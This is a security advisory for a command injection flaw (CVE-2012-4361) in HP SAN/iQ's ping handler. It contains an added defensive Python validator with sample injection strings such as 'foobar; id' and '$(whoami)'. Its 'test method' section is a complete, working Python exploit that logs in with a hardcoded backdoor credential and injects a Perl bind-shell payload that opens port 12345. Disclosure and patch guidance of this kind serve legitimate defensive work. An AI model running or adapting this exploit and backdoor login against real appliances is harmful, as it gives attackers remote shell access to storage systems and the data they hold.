Release date:
Updated on:
Affected Systems:
HP SAN/iQ < 9.5
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 55132
CVE ID: CVE-2012-4361
HP SAN/iQ is a powerful, reliable, and scalable data architecture.
HP Virtual SAN Appliance running SAN/iQ versions earlier than 9.5 has a command injection vulnerability in the lhn/public/network/ping handler: remote authenticated users can execute arbitrary commands by placing shell metacharacters in the second parameter of that request.
<* Source: Nicolas Gregoire (ngregoire@exaprobe.com)
Link: http://www.kb.cert.org/vuls/id/441363
http://www.exploit-db.com/exploits/18901/
http://www.exploit-db.com/exploits/18893/
*>
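As an added, defender-side example that is not part of this advisory or of the vendor's code, the following Python 3 script parses requests of the ping path quoted above, applies allow-list validation to both path parameters and builds a shell-free argument vector; the sample requests, the regular expressions and the treatment of the second parameter as a packet count are assumptions of this example.

```python
import re
import subprocess

# Constructed sample requests in the shape quoted by the advisory
# (two path parameters after /ping/); none of these values come from a real system.
SAMPLE_REQUESTS = [
    "get:/lhn/public/network/ping/127.0.0.1/4",             # benign
    "get:/lhn/public/network/ping/127.0.0.1/foobar; id /",  # ';' in the second parameter
    "get:/lhn/public/network/ping/10.0.0.5/$(whoami)",      # command substitution
    "get:/lhn/public/network/ping/10.0.0.5",                # second parameter missing
]

_REQ_RE = re.compile(r"^get:/lhn/public/network/ping/([^/]+)/([^/]+)/?$")
# Allow-lists. First parameter: IPv4 dotted quad or DNS hostname. Second parameter:
# the advisory does not say what it means, so this example assumes a small packet count.
_HOST_RE = re.compile(
    r"^(?:(?:\d{1,3}\.){3}\d{1,3}|[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?)$")
_COUNT_RE = re.compile(r"^[1-9]\d{0,2}$")

def parse_ping_request(req):
    """Split a ping request into its two path parameters; None if the shape is wrong."""
    m = _REQ_RE.match(req)
    return m.groups() if m else None

def validate_ping_params(host, count):
    """Allow-list check: anything outside the expected alphabet (so every shell
    metacharacter, without having to enumerate them) is refused."""
    return bool(_HOST_RE.match(host)) and bool(_COUNT_RE.match(count))

def classify_request(req):
    """'ok', 'rejected' (parameters carry unexpected characters) or 'malformed'."""
    parsed = parse_ping_request(req)
    if parsed is None:
        return "malformed"
    return "ok" if validate_ping_params(*parsed) else "rejected"

def build_ping_argv(host, count):
    """Argument vector for subprocess.run(argv) with shell=False: each parameter is a
    discrete argv element, so no shell ever parses the user-controlled strings."""
    if not validate_ping_params(host, count):
        raise ValueError("rejected ping parameters: %r %r" % (host, count))
    return ["ping", "-c", count, host]

def run_ping(req):
    """Validate first, then execute without a shell; returns the exit status."""
    host, count = parse_ping_request(req)
    return subprocess.run(build_ping_argv(host, count), check=False).returncode

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print("%-9s %s" % (classify_request(req), req))
```

Only the benign request reaches build_ping_argv; the two injection attempts are refused by the allow-list before any process is started, and the truncated request is reported as malformed.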
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
Nicolas Gregoire (ngregoire@exaprobe.com) provides the following test methods:
#!/usr/bin/python

''' ==========================================
    Pseudo documentation
    ======================================== '''

# HP VSA / SAN/iQ Hydra client
# Nicolas Grégoire <nicolas.gregoire@agarri.fr>
# v0.5

''' ==========================================
    Target information
    ======================================== '''

HOST = '192.168.201.11'  # The remote host (placeholder address)
PORT = 13838             # The Hydra port

''' ==========================================
    Imports
    ======================================== '''

import getopt
import re
import sys
import binascii
import struct
import socket
import os

''' ==========================================
    Define functions
    ======================================== '''

# Some nice formatting
def zprint(str):
    print '[=] ' + str

# Define packets
def send_Exec():
    zprint('Send Exec')
    # RESTRICTIONS
    # You can't use "/" in the payload
    # No Netcat/Ruby/PHP, but telnet/bash/perl are available
    # METASPLOIT PAYLOAD
    cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,12345,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
    # COMMAND INJECTION BUG
    # The second parameter of the ping path is terminated with ';' so that cmd is
    # interpreted as a separate shell command; the trailing '/' closes the path.
    data = 'get:/lhn/public/network/ping/127.0.0.1/foobar;' + cmd + '/'
    # EXPLOIT
    zprint('Now connect to port 12345 of machine ' + str(HOST))
    send_packet(data)

def send_Login():
    zprint('Send Login')
    data = 'login:/global$agent/L0CAlu53R/Version "8.5.0"'  # Backdoor
    send_packet(data)

# Define the sending function
def send_packet(message):
    # Add header: fixed prefix, big-endian 32-bit length of the NUL-terminated
    # message, then a second fixed block of unknown meaning
    ukn1 = '\x00\x00\x00\x00\x00\x00\x00\x01'
    ukn2 = '\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x00\x14\xff'
    message = message + '\x00'
    data = ukn1 + struct.pack('!I', len(message)) + ukn2 + message
    # Send & receive
    s.send(data)
    data = s.recv(1024)
    zprint('Received: [' + data + ']')

''' ==========================================
    Main code
    ======================================== '''

# Print banner
zprint('HP Hydra client')
zprint('Attacking host ' + HOST + ' on port ' + str(PORT))

# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((HOST, PORT))

# Attack!
send_Login()
send_Exec()

# Disconnect
s.close()

# Exit
zprint('Exit')
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
HP
--
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://itrc.hp.com